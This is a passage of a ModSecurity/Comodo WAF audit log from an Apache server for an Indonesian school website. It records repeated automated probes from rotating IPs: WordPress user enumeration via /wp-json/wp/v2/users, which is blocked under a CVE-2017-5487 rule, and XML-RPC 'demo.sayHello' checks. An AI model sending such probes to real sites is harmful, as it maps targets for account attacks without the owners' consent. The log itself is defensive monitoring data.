[uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453310620561 3984 (- - -) Stopwatch2: 1747453310620561 3984; combined=2773, p1=394, p2=2231, p3=24, p4=26, p5=59, sr=53, sw=39, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd595757-Z-- --ac44e876-A-- [17/May/2025:10:45:53 +0700] aCgGcem4kjNN-hEbWjJDWQAAAEw 103.236.140.4 51110 103.236.140.4 8181 --ac44e876-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ac44e876-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac44e876-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453553522493 2970 (- - -) Stopwatch2: 1747453553522493 2970; combined=1273, p1=421, p2=818, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac44e876-Z-- --0fa7de47-A-- [17/May/2025:10:46:00 +0700] aCgGeOm4kjNN-hEbWjJDWgAAAE0 103.236.140.4 51114 103.236.140.4 8181 --0fa7de47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.41 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0fa7de47-C-- demo.sayHello --0fa7de47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fa7de47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453560528067 6485 (- - -) Stopwatch2: 1747453560528067 6485; combined=4736, p1=639, p2=3847, p3=34, p4=35, p5=104, sr=81, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fa7de47-Z-- --8091c632-A-- [17/May/2025:10:46:17 +0700] aCgGiXyxdQCiyU1ENFcrrgAAAAY 103.236.140.4 51118 103.236.140.4 8181 --8091c632-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8091c632-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8091c632-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453577593631 2862 (- - -) Stopwatch2: 1747453577593631 2862; combined=1306, p1=429, p2=845, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8091c632-Z-- --46b4336f-A-- [17/May/2025:10:46:24 +0700] aCgGkOm4kjNN-hEbWjJDWwAAAE4 103.236.140.4 51128 103.236.140.4 8181 --46b4336f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --46b4336f-C-- demo.sayHello --46b4336f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --46b4336f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453584202985 4863 (- - -) Stopwatch2: 1747453584202985 4863; combined=3809, p1=468, p2=3137, p3=24, p4=25, p5=92, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46b4336f-Z-- --761d3129-A-- [17/May/2025:10:47:22 +0700] aCgGyum4kjNN-hEbWjJDXAAAAFA 103.236.140.4 51132 103.236.140.4 8181 --761d3129-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --761d3129-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --761d3129-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453642047111 2943 (- - -) Stopwatch2: 1747453642047111 2943; combined=1320, p1=454, p2=836, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --761d3129-Z-- --c0b9b878-A-- [17/May/2025:10:47:30 +0700] aCgG0um4kjNN-hEbWjJDXwAAAFM 103.236.140.4 51140 103.236.140.4 8181 --c0b9b878-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c0b9b878-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0b9b878-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453650259177 3286 (- - -) Stopwatch2: 1747453650259177 3286; combined=1412, p1=468, p2=901, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0b9b878-Z-- --ffe3bd60-A-- [17/May/2025:10:47:30 +0700] aCgG0um4kjNN-hEbWjJDYAAAAFQ 103.236.140.4 51142 103.236.140.4 8181 --ffe3bd60-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.35 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ffe3bd60-C-- demo.sayHello --ffe3bd60-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffe3bd60-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453650359842 5178 (- - -) Stopwatch2: 1747453650359842 5178; combined=4239, p1=448, p2=3557, p3=39, p4=42, p5=89, sr=66, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffe3bd60-Z-- --86fe7b26-A-- [17/May/2025:10:47:36 +0700] aCgG2Om4kjNN-hEbWjJDYwAAAEE 103.236.140.4 51148 103.236.140.4 8181 --86fe7b26-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86fe7b26-C-- demo.sayHello --86fe7b26-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86fe7b26-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453656096717 5662 (- - -) Stopwatch2: 1747453656096717 5662; combined=4145, p1=564, p2=3357, p3=33, p4=36, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86fe7b26-Z-- --3a2aea5b-A-- [17/May/2025:10:47:43 +0700] aCgG33yxdQCiyU1ENFcrsgAAABA 103.236.140.4 51152 103.236.140.4 8181 --3a2aea5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a2aea5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a2aea5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453663749318 2593 (- - -) Stopwatch2: 1747453663749318 2593; combined=1158, p1=408, p2=721, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a2aea5b-Z-- --2f0c5118-A-- [17/May/2025:10:47:51 +0700] aCgG5-m4kjNN-hEbWjJDZgAAAEY 103.236.140.4 51156 103.236.140.4 8181 --2f0c5118-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.102 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f0c5118-C-- demo.sayHello --2f0c5118-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f0c5118-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453671693360 6666 (- - -) Stopwatch2: 1747453671693360 6666; combined=4695, p1=613, p2=3883, p3=36, p4=36, p5=76, sr=81, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f0c5118-Z-- --6fe35525-A-- [17/May/2025:10:48:36 +0700] aCgHFATOsBn9MSWb6WJwJwAAAIE 103.236.140.4 51168 103.236.140.4 8181 --6fe35525-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6fe35525-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fe35525-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453716723203 2973 (- - -) Stopwatch2: 1747453716723203 2973; combined=1300, p1=430, p2=833, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fe35525-Z-- --e0700a73-A-- [17/May/2025:10:48:43 +0700] aCgHG-m4kjNN-hEbWjJDaAAAAEo 103.236.140.4 51172 103.236.140.4 8181 --e0700a73-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0700a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0700a73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453723890064 2086 (- - -) Stopwatch2: 1747453723890064 2086; combined=1001, p1=360, p2=614, p3=0, p4=0, p5=27, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0700a73-Z-- --71b9aa03-A-- [17/May/2025:10:48:44 +0700] aCgHHOm4kjNN-hEbWjJDaQAAAEk 103.236.140.4 51174 103.236.140.4 8181 --71b9aa03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71b9aa03-C-- demo.sayHello --71b9aa03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71b9aa03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453724050468 6432 (- - -) Stopwatch2: 1747453724050468 6432; combined=4565, p1=620, p2=3767, p3=31, p4=34, p5=67, sr=115, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71b9aa03-Z-- --31165f71-A-- [17/May/2025:10:48:46 +0700] aCgHHgTOsBn9MSWb6WJwKAAAAIA 103.236.140.4 51180 103.236.140.4 8181 --31165f71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31165f71-C-- demo.sayHello --31165f71-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31165f71-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453726572745 4845 (- - -) Stopwatch2: 1747453726572745 4845; combined=3867, p1=431, p2=3115, p3=23, p4=25, p5=150, sr=67, sw=123, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31165f71-Z-- --7dafb663-A-- [17/May/2025:10:49:03 +0700] aCgHL3yxdQCiyU1ENFcruAAAAAA 103.236.140.4 51184 103.236.140.4 8181 --7dafb663-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7dafb663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dafb663-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453743494764 2842 (- - -) Stopwatch2: 1747453743494764 2842; combined=1232, p1=436, p2=767, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dafb663-Z-- --2f96af4d-A-- [17/May/2025:10:49:10 +0700] aCgHNgTOsBn9MSWb6WJwKQAAAIM 103.236.140.4 51188 103.236.140.4 8181 --2f96af4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.171.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.171.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2f96af4d-C-- demo.sayHello --2f96af4d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f96af4d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453750411850 6487 (- - -) Stopwatch2: 1747453750411850 6487; combined=4690, p1=625, p2=3827, p3=38, p4=42, p5=96, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f96af4d-Z-- --5fed524b-A-- [17/May/2025:10:50:37 +0700] aCgHjem4kjNN-hEbWjJDbgAAAFM 103.236.140.4 51196 103.236.140.4 8181 --5fed524b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5fed524b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fed524b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at 